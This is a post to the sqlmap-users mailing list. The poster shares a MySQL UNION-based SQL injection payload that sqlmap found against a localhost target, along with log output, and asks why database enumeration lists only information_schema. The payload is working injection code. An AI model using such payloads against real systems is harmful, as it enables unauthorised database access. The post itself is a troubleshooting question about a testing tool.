So I was doing an experiment at work today with sqlmap. sqlmap found the following injection:
Type: UNION query Title: MySQL UNION query (NULL) - 11 to 20 columns Payload: http://localhost:80/-1616 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,110,105,115,58),IFNULL(CAST(CHAR(122,81,104,83,72,98,108,107,112,107) AS CHAR),CHAR(32)),CHAR(58,115,100,101,58)), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# And when trying to list the databases, I get the following: [18:17:45] [INFO] fetching database names [18:17:47] [INFO] the SQL query used returns 6 entries available databases [1]: [*] information_schema But I can still query from the other 5 databases and reach all data by manually altering the injection query. Anyone have any idea what's up with that? ------------------------------------------------------------------------------ All the data continuously generated in your IT infrastructure contains a definitive record of customers, application performance, security threats, fraudulent activity, and more. Splunk takes this data and makes sense of it. IT sense. And common sense. http://p.sf.net/sfu/splunk-novd2d _______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
